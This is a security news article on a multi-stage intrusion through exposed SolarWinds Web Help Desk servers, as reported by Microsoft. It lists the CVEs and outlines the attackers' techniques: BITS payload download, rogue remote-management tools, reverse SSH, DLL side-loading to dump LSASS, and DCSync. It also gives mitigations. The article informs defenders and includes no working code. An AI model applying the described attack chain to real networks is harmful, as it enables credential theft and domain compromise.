SolarWinds Web Help Desk Exploited for RCE in Multi-Stage Attacks on Exposed Servers
Source: The Hacker News
Ravie Lakshmanan
Feb 09, 2026 – Vulnerability / Endpoint Security
Microsoft observation
Microsoft has revealed that it observed a multi‑stage intrusion involving threat actors exploiting internet‑exposed SolarWinds Web Help Desk (WHD) instances to obtain initial access and laterally move across the organization’s network to other high‑value assets.
The Microsoft Defender Security Research Team noted that it is not clear whether the activity weaponized the recently disclosed flaws (CVE‑2025‑40551, CVSS 9.8 and CVE‑2025‑40536, CVSS 8.1) or a previously patched vulnerability (CVE‑2025‑26399, CVSS 9.8).
“Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold,” the company said in a report published last week.
Vulnerabilities involved
- CVE‑2025‑40536 – security‑control‑bypass vulnerability that could allow an unauthenticated attacker to access restricted functionality.
- CVE‑2025‑40551 and CVE‑2025‑26399 – untrusted‑data deserialization flaws that could lead to remote code execution.
CISA action
Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE‑2025‑40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. Federal Civilian Executive Branch (FCEB) agencies were ordered to apply the fixes for the flaw by February 6, 2026.
Attack details
In the attacks detected by Microsoft, successful exploitation of the exposed SolarWinds WHD instance allowed the attackers to achieve unauthenticated remote code execution and run arbitrary commands within the WHD application context.
“Upon successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage [BITS – Background Intelligent Transfer Service] for payload download and execution,” noted researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini.
Follow‑up actions observed
- Downloaded legitimate components associated with Zoho ManageEngine (a remote‑monitoring‑and‑management solution) to enable persistent remote control.
- Enumerated sensitive domain users and groups, including Domain Admins.
- Established persistence via reverse SSH and RDP access; attempted to create a scheduled task that would launch a QEMU virtual machine under the SYSTEM account at startup, thereby masking activity while exposing SSH via port‑forwarding.
- Performed DLL side‑loading on some hosts using
wab.exe(the Windows Address Book executable) to load a rogue DLL (sspicli.dll) that dumped LSASS memory for credential theft.
In at least one case, Microsoft reported that the threat actors conducted a DCSync attack (MITRE ATT&CK T1003.006), simulating a Domain Controller to request password hashes and other sensitive data from the Active Directory database.
Mitigation recommendations
- Patch SolarWinds WHD instances promptly and keep them up‑to‑date.
- Identify and remove any unauthorized RMM tools (e.g., rogue Zoho ManageEngine components).
- Rotate service‑account and administrative passwords.
- Isolate compromised machines to limit further lateral movement.
- Monitor for abnormal use of legitimate binaries (e.g.,
wab.exe) and for unexpected scheduled tasks or virtual‑machine launches.
“This activity reflects a common but high‑impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored,” the Windows maker said.
“In this intrusion, attackers relied heavily on living‑off‑the‑land techniques…”
Takeaways
- Defense in depth
- Timely patching of internet‑facing services
- Behavior‑based detection across identity, endpoint, and network layers
Found this article interesting? Follow us for more exclusive content: